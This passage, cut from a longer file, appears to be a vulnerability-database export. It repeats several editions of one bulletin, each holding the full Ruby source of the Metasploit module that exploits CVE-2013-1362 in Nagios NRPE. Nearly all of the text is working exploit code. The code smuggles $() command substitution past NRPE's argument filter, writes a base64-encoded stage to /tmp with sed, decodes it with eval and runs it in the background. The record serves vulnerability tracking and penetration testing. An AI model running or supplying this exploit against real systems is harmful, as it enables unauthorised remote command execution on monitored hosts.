end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-06T20:15:10", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-06T22:15:15", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-06T22:15:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-06T22:15:15", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-07T00:19:28", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-07T00:19:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-07T00:19:28", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-07T02:16:10", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-07T02:16:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-07T02:16:10", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-25T11:05:10", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-25T11:05:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, 